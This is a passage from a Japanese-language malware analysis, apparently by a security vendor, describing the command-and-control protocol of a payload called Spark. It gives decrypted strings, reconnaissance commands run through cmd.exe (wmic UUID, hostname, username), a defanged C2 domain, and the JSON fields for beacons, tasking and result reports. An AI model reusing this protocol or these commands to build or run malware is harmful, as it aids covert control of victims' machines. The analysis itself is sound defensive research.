    \u88684. C2\u901a\u4fe1\u3067\u4f7f\u7528\u3059\u308bJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2\u3068\u3057\u3066Spark\u304c\u4f7f\u7528\u3059\u308b\u540d(\u30d5\u30a1\u30fc\u30b9\u30c8 \u30cd\u30fc\u30e0)<\/em><\/span><\/p>\n
    C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u3092\u884c\u3046\u524d\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3059\u308b\u30b3\u30de\u30f3\u30c9\u306b\u52a0\u3048\u3001\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u30c7\u30d0\u30c3\u30b0\u306b\u4f7f\u7528\u3059\u308b\u6587\u5b57\u5217\u3092\u542b\u3080\u30d0\u30c3\u30d5\u30a1\u3092\u3082\u30461\u3064\u5fa9\u53f7\u3057\u307e\u3059\u3002\u88685\u306f\u3001\u5fa9\u53f7\u3055\u308c\u305f\u6587\u5b57\u5217\u3068\u305d\u306e\u76ee\u7684\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    \u5fa9\u53f7\u3055\u308c\u305f\u6587\u5b57\u5217<\/strong><\/td>\n\u8aac\u660e<\/strong><\/td>\n<\/tr>\n
    1<\/td>\n\u76ee\u7684\u4e0d\u660e\u3060\u304c\u3001Averizt\u30d5\u30a3\u30fc\u30eb\u30c9\u306eC2\u306b\u9001\u4fe1\u3055\u308c\u3066\u3044\u308b<\/td>\n<\/tr>\n
    311OEVZihfReZStoFf4cfg==<\/td>\n\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u30db\u30b9\u30c8\u540d\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c hostname\u306b\u306a\u308b<\/td>\n<\/tr>\n
    Z9Q1WVryAIzLVSxF1yWRwg==<\/td>\n\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001cmd.exe\u306e\u5834\u6240\u3092\u53d6\u5f97\u3057\u3066\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b%COMSPEC%\u306b\u306a\u308b<\/td>\n<\/tr>\n
    P5K5He\/2wSGGsvrFPKYpwg4KjBLyTOpbsGJwm1DckoyGK8eXeNMZCQBfHzkYRSjJlGcw6Ckn41X0MY3zJcU65uMvxpABv\/g+ttABRJsG7js=<\/td>\n\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30b7\u30b9\u30c6\u30e0\u306eUUID\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c wmic csproduct get UUID | more +1 | cmd \/q \/v:on \/c \"set\/p .=&echo(!.!\"\u306b\u306a\u308b<\/td>\n<\/tr>\n
    AykC+x26hhd5DfrB\/yly9gXcFsIlVxO9<\/td>\n\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001\u30ed\u30b0\u30a4\u30f3 \u30a2\u30ab\u30a6\u30f3\u30c8\u306e\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u53d6\u5f97\u3059\u308b\u306e\u306b\u4f7f\u7528\u3055\u308c\u308b\/c echo %username%\u306b\u306a\u308b<\/td>\n<\/tr>\n
    ok<\/td>\n\u30b3\u30de\u30f3\u30c9\u306e\u6b63\u5e38\u306a\u5b9f\u884c\u3092\u793a\u3059\u6c4e\u7528\u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n
    Create Pipe Error<\/td>\n\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u30d1\u30a4\u30d7\u306e\u4f5c\u6210\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n
    Create processa error<\/td>\n\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n
    Get exit code process error<\/td>\n\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u3092\u8a66\u307f\u305f\u3068\u304d\u306bGetExitCodeProcess\u3092\u30b3\u30fc\u30eb\u3057\u3066\u30a8\u30e9\u30fc \u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u53d6\u5f97\u3059\u308b\u969b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n
    0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&*()_+<\/td>\n\u4e0d\u660e\u3002\u3053\u306e\u30b3\u30fc\u30c9\u3067\u306f\u4f7f\u7528\u3055\u308c\u3066\u3044\u306a\u3044\u3068\u601d\u308f\u308c\u307e\u3059<\/td>\n<\/tr>\n
    Set handle information error<\/td>\n\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30aa\u30d6\u30b8\u30a7\u30af\u30c8 \u30cf\u30f3\u30c9\u30eb\u3092\u7d99\u627f\u3059\u308b\u305f\u3081\u306b\u4f5c\u6210\u3055\u308c\u305f\u30d7\u30ed\u30bb\u30b9\u306estdout\u306e\u8a2d\u5b9a\u3092\u8a66\u307f\u305f\u3068\u304d\u3001SetHandleInformation\u306e\u547c\u3073\u51fa\u3057\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n
    Wait for single object error<\/td>\n\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u30b3\u30de\u30f3\u30c9\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u4f5c\u6210\u3092\u8a66\u307f\u305f\u5f8c\u3001WaitForSingleObject\u306e\u547c\u3073\u51fa\u3057\u306b\u5931\u6557\u3057\u305f\u5834\u5408\u306bC2\u306b\u9001\u4fe1\u3055\u308c\u308b\u30c7\u30d0\u30c3\u30b0 \u30e1\u30c3\u30bb\u30fc\u30b8<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
    \u88685. \u30da\u30a4\u30ed\u30fc\u30c9\u304cC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u306b\u4f7f\u7528\u3059\u308b\u30d0\u30c3\u30d5\u30a1\u5185\u306eJSON\u30ad\u30fc\/\u5024\u306e\u30da\u30a2<\/em><\/span><\/p>\n
    <\/a>Spark C2\u901a\u4fe1<\/h3>\n
    \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30c7\u30fc\u30bf \u30bb\u30af\u30b7\u30e7\u30f3\u5185\u306bbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u542b\u3081\u3066HTTP POST\u8981\u6c42\u3092\u767a\u884c\u3059\u308b\u3053\u3068\u3067\u305d\u306eC2\u30b5\u30fc\u30d0\u30fc\u306elaceibagrafica[.]com\u3068\u901a\u4fe1\u3057\u307e\u3059\u3002\u3053\u308c\u307e\u3067\u306b\u3053\u306eC2\u30c1\u30e3\u30cd\u30eb\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u3066\u3044\u306a\u3044\u305f\u3081\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3068C2\u30b5\u30fc\u30d0\u30fc\u306e\u9593\u306e\u9001\u53d7\u4fe1\u306e\u6982\u8981\u3092\u793a\u3057\u3001\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u88684\u306e\u540d\u524d\u3092\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u304b\u3092\u793a\u3057\u307e\u3059\u3002\u79c1\u305f\u3061\u306f\u3001\u3053\u306e\u5206\u6790\u3092\u884c\u3046\u305f\u3081\u306bC2\u30b5\u30fc\u30d0\u30fc\u3092\u4f5c\u6210\u3057\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u3084\u308a\u53d6\u308a\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3001\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u306eHTTP\u5fdc\u7b54\u306e\u3059\u3079\u3066\u304c\u3001C2\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3092\u958b\u767a\u3057\u305f\u653b\u6483\u8005\u304b\u3089\u3067\u306a\u304f\u3001\u79c1\u305f\u3061\u304c\u4f5c\u6210\u3057\u305fC2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u884c\u308f\u308c\u308b\u3088\u3046\u306b\u3057\u307e\u3057\u305f\u3002\u56f36\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u305d\u306eC2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u305f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u3078\u306e\u30a2\u30a6\u30c8\u30d0\u30f3\u30c9\u8981\u6c42\u306f\u3059\u3079\u3066\u8996\u899a\u7684\u306b\u985e\u4f3c\u3057\u3066\u3044\u307e\u3059\u3002\u3069\u308c\u3082\u3001\u540c\u3058URL\u306b\u5bfe\u3057\u3066HTTP POST\u8981\u6c42\u3092\u884c\u3044\u3001\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3067\u3059\u3002<\/p>\n
    \"Figure<\/span><\/p>\n
    \u56f36. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u308b\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3<\/span><\/p>\n
    \u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u5185\u306e\u30c7\u30fc\u30bf \u30bb\u30af\u30b7\u30e7\u30f3\u306f\u3001\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3066\u5fa9\u53f7\u3055\u308c\u3001JSON\u30e1\u30c3\u30bb\u30fc\u30b8{\"CallieVK\":\"W10=\",\"ReeceWNM\":\"Jessicay\"}\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306eJSON\u30e1\u30c3\u30bb\u30fc\u30b8\u306b\u306f\u30012\u3064\u306e\u30ad\u30fc\/\u5024\u306e\u30da\u30a2\u304c\u3042\u308a\u307e\u3059\u3002\"ReeceWNM\"\u30ad\u30fc\u3068\u305d\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u793a\u3059\u5024\u304a\u3088\u3073\"CallieVK\"\u3068\u3044\u3046\u30ad\u30fc\u3068\u305d\u306e\u30c7\u30fc\u30bf\u3092\u793a\u3059\u5024\u3067\u3059\u3002\u4f8b\u3048\u3070\u3001\"ReeceWNM\"\u30ad\u30fc\u306b\u306f\"Jessicay\"\u3068\u3044\u3046\u540d\u524d\u304c\u542b\u307e\u308c\u3001\u3053\u308c\u306f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u306e\u901a\u4fe1\u30bf\u30a4\u30d7\u3092\u793a\u3059\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306fC2\u30b5\u30fc\u30d0\u30fc\u306e\u5fdc\u7b54\u3092\u5fa9\u53f7\u3057\u3001\"EverlyY\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u63a2\u3057\u3066\u305d\u306e\u5024\u3092\u30b9\u30ea\u30fc\u30d7\u9593\u9694\u3068\u3057\u3066\u4f7f\u7528\u3057\u3066\u304b\u3089\u7d9a\u884c\u3057\u307e\u3059\u3002\u56f37\u306f\u3001\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3\u306b\u5bfe\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306e\u5fdc\u7b54\u3092\u793a\u3057\u3066\u304a\u308a\u3001\u305d\u306e\u5fdc\u7b54\u306f{\"EverlyY\": 0}\u306b\u5fa9\u53f7\u3055\u308c\u307e\u3059\u3002<\/p>\n
    \"Figure<\/span><\/p>\n
    \u56f37. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u305f\u6700\u521d\u306e\u30d3\u30fc\u30b3\u30f3<\/span><\/p>\n
    \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001EverlyY\u5fdc\u7b54\u3092\u53d7\u4fe1\u3057\u305f\u5f8c\u3001'cmd.exe'\u3092\u4f7f\u7528\u3057\u3066\u6b21\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u3067\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3001\u5177\u4f53\u7684\u306b\u306f\u30e6\u30fc\u30b6\u30fc\u540d\u3001\u30db\u30b9\u30c8\u540d\u3001\u304a\u3088\u3073\u30b7\u30b9\u30c6\u30e0\u56fa\u6709\u306eUUID\u3092\u53ce\u96c6\u3057\u307e\u3059\u3002<\/p>\n
      \n
    1. wmic csproduct get UUID | more +1 | cmd \/q \/v:on \/c \"set\/p .=&echo(!.!\"<\/li>\n
    2. hostname<\/li>\n
    3. echo %username%<\/li>\n<\/ol>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u305d\u308c\u305e\u308c\u3092\u3001JSON\u306bbase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3067\u30d5\u30a3\u30fc\u30eb\u30c9\u540d\"ZaydenlnL\"\u5185\u306b\u4fdd\u5b58\u3057\u3001\"AngelxEv\"\u3068\u3044\u3046\u540d\u3092\u4f7f\u7528\u3057\u3066\u30c7\u30fc\u30bf\u306e\u30bf\u30a4\u30d7\u3092\u8868\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u524d\u8ff0\u306e\u30ea\u30b9\u30c8\u306e\u7d50\u679c\u306b\u5bfe\u5fdc\u3057\u305f\u6570\u5b57\u3067\u3042\u308a\u30011\u306fUUID\u30012\u306f\u30db\u30b9\u30c8\u540d\u30013\u306f\u30e6\u30fc\u30b6\u30fc\u540d\u3092\u8868\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e3\u3064\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\"Maximiliano\"\u3068\u3044\u3046\u540d\u524d\u306eJSON\u914d\u5217\u306b\u8ffd\u52a0\u3055\u308c\u3066\u3001C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6b21\u306e\u3088\u3046\u306bJSON\u306b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u683c\u7d0d\u3057\u307e\u3059\u3002<\/p>\n
      {\"Maximiliano\":[{\"AngelxEv\":1,\"Houstonod\":1,\"ZaydenlnL\":\"<base64 encoded ciphertext of UUID>\"},{\"AngelxEv\":3,\"Houstonod\":1,\"ZaydenlnL\":\"<base64 encoded ciphertext of username>\"},{\"AngelxEv\":2,\"Houstonod\":1,\"ZaydenlnL\":\"<base64 encoded ciphertext of hostname>\"}]}<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u60c5\u5831JSON\u306b\"CallieVK\"\u5024\u3092\u8a2d\u5b9a\u3057\u3001\"ReeceWNM\"\u306e\u5024\u306b\u901a\u4fe1\u30bf\u30a4\u30d7\"JoslynKe\"\u3092\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u3067\u3001\u30a2\u30a6\u30c8\u30d0\u30a6\u30f3\u30c9\u901a\u4fe1JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u7d50\u679c\u306eJSON\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n
      {\"CallieVK\":\"<base64 encoded ciphertext of system information \"Maximiliano\" JSON array>\",\"ReeceWNM\":\"JoslynKe\"}<\/span><\/p>\n
      \u7d50\u679c\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306f\u3001\u56f38\u306e\u4f8b\u306e\u8981\u6c42\u306e\u3088\u3046\u306b\u3001base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u3001HTTP POST\u30c7\u30fc\u30bf\u5185\u306b\u683c\u7d0d\u3055\u308c\u3066C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f38. \u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u308b\u30b7\u30b9\u30c6\u30e0\u60c5\u5831<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u9001\u4fe1\u3057\u305f\u5f8c\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u306e\u5fdc\u7b54\u5185\u3067\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u56f39\u306f\u3001\u3053\u306e\u8981\u6c42\u306b\u5bfe\u3059\u308b\u5fdc\u7b54\u3092\u793a\u3057\u3066\u304a\u308a\u3001\u3053\u308c\u306b\u542b\u307e\u308c\u3066\u3044\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u30da\u30a4\u30ed\u30fc\u30c9\u304c\u89e3\u6790\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f39. \u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b3\u30de\u30f3\u30c9\u3092\u542b\u3080\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u304c\u542b\u307e\u308c\u305fC2\u30b5\u30fc\u30d0\u30fc\u5fdc\u7b54<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b3\u30de\u30f3\u30c9 \u30cf\u30f3\u30c9\u30e9\u3092\u6301\u3063\u3066\u3044\u307e\u305b\u3093\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001CreateProcessW API\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u3067C2\u306e\u5fdc\u7b54\u5185\u306eJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u51e6\u7406\u3057\u3066\u3001\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u305f\u308a\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u4e88\u671f\u3055\u308c\u308bJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u306f\u3001\"Jordanlzw\"\u3068\u3044\u3046\u540d\u524d\u306e\u914d\u5217\u304c\u542b\u307e\u308c\u3066\u3044\u3066\u3001\u305d\u308c\u306b\u306f\u3001\"Ivory\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u30bf\u30b9\u30af\u8b58\u5225\u756a\u53f7\u3001\"Alanih\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u5b9f\u884c\u3059\u308b\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u540d\u3001\"TrumanRd\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u305d\u306e\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306b\u6e21\u3059\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u304c\u6307\u5b9a\u3055\u308c\u308b1\u3064\u4ee5\u4e0a\u306e\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u56f39\u306e\u5fa9\u53f7\u3055\u308c\u305f\u5fdc\u7b54\u306b\u306f\u3001JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u304c\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u3001\"c:\\windows\\system32\\cmd.exe\"\u3092\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\"\/c whoami\"\u3092\u4f7f\u7528\u3057\u3066\u5b9f\u884c\u3059\u308b\u3088\u3046\u306b\u6307\u793a\u3057\u3001\u5b9f\u8cea\u7684\u306b\u306f\u3053\u308c\u306b\u3088\u3063\u3066\"whoami\"\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n
      {\"Aryana\": 0, \"Jordanlzw\" :[{\"Ivory\" : 5, \"Jonas\" : true, \"Reginacy\" : false, \"TrumanRd\" : \"\/NKg0zJdCDP1XlK9NJ4eJA==\", \"Alanih\" : \"i8KOnxchf86h8NKfF45XMETHhwTx6yF3AfMoWzyG9wA=\", \"LondonzO\" : true}]}<\/span><\/p>\n
      C2\u306b\u3088\u3063\u3066\u63d0\u4f9b\u3055\u308c\u308b\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u305f\u5f8c\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306fC2\u30b5\u30fc\u30d0\u30fc\u306b\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u9001\u4fe1\u3057\u307e\u3059\u3002\u3053\u306e\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u3001\u305d\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u7279\u5b9a\u306e\u30bf\u30b9\u30af\u8b58\u5225\u5b50\u3092\u9001\u4fe1\u3059\u308b\u3053\u3068\u3067\u3001\u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u3053\u3068\u3092C2\u306b\u901a\u77e5\u3059\u308b\u76ee\u7684\u3092\u6301\u3064\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u6b21\u306eJSON\u306b\u793a\u3059\u3088\u3046\u306b\u3001\u901a\u4fe1\u30bf\u30a4\u30d7\"MorganE\"\u3092\u4f7f\u7528\u3057\u3066C2\u306b\u901a\u77e5\u3057\u307e\u3059\u3002<\/p>\n
      {\"CallieVK\":\"eyJKYXNlTiI6W3siTGF3cmVuY2UiOjV9XX0=\",\"ReeceWNM\":\"MorganE\"}<\/span><\/p>\n
      \"CallieVK\"\u30d5\u30a3\u30fc\u30eb\u30c9\u5185\u306e\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30c7\u30fc\u30bf\u306b\u306f\u3001\"JaseN\"\u3068\u3044\u3046\u540d\u524d\u306eJSON\u914d\u5217\u304c\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u3053\u308c\u306b\u306f\u3001\u53d7\u4fe1\u3057\u305f\u30bf\u30b9\u30af\u756a\u53f7\u304c\u542b\u307e\u308c\u305f\"Lawrence\"\u3068\u3044\u3046\u30d5\u30a3\u30fc\u30eb\u30c9\u540d\u3092\u6301\u30641\u3064\u4ee5\u4e0a\u306e\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001{\"JaseN\":[{\"Lawrence\":5}]}\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306e\u80af\u5b9a\u5fdc\u7b54\u306f\u3001\u56f310\u306b\u793a\u3059\u3088\u3046\u306bC2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3055\u308c\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f310. \u30b3\u30de\u30f3\u30c9\u3092\u53d7\u4fe1\u3057\u305f\u3053\u3068\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u901a\u77e5\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30b3\u30de\u30f3\u30c9\u306e\u53d7\u4fe1\u3092\u80af\u5b9a\u5fdc\u7b54\u3057\u305f\u5f8c\u3001C2\u304c\u3001{\"Allier\" : 7}\u306a\u3069\u306e\u3088\u3046\u306b\u3001\"Allier\"\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u6570\u5b57\u304c\u8a2d\u5b9a\u3055\u308c\u305fJSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u542b\u3080\u5fdc\u7b54\u3092\u3059\u308b\u3053\u3068\u3092\u671f\u5f85\u3057\u307e\u3059\u3002\u3053\u306e\u9001\u4fe1\u306e\u76ee\u7684\u3084\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3053\u306e\u6570\u5024\u304c\u3069\u306e\u3088\u3046\u306b\u4f7f\u7528\u3055\u308c\u308b\u306e\u304b\u306f\u3088\u304f\u308f\u304b\u308a\u307e\u305b\u3093\u304c\u3001\u56f311\u306b\"Allier\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3092\u542b\u3080base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u793a\u3057\u307e\u3059\u3002<\/p>\n
      \"Figure<\/span><\/p>\n
      \u56f311 Allier JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u63d0\u4f9b\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc<\/span><\/p>\n
      \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\"Allier\" JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u53d7\u4fe1\u3057\u305f\u5f8c\u3001\u5b9f\u884c\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3057\u307e\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\"Zeke\"\u3068\u3044\u3046\u540d\u524d\u306e\u914d\u5217\u3092\u6301\u3064JSON\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u914d\u5217\u306b\u306f\u3001\u30b3\u30de\u30f3\u30c9\u306e\u7d50\u679c\u3092\u4fdd\u5b58\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3059\u308b\"FrederickT\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3001\u30bf\u30b9\u30af\u8b58\u5225\u5b50\u3092\u793a\u3059\"ReesefP\"\u30d5\u30a3\u30fc\u30eb\u30c9\u3001\u30b3\u30de\u30f3\u30c9\u304c\u6210\u529f\u3057\u305f\u5834\u5408\u306e\u30d6\u30fc\u30eb\u5024\u3092\u683c\u7d0d\u3059\u308b\"